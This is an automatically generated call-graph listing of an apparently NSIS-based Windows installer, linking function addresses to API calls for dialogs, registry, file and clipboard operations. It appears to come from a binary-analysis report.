DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 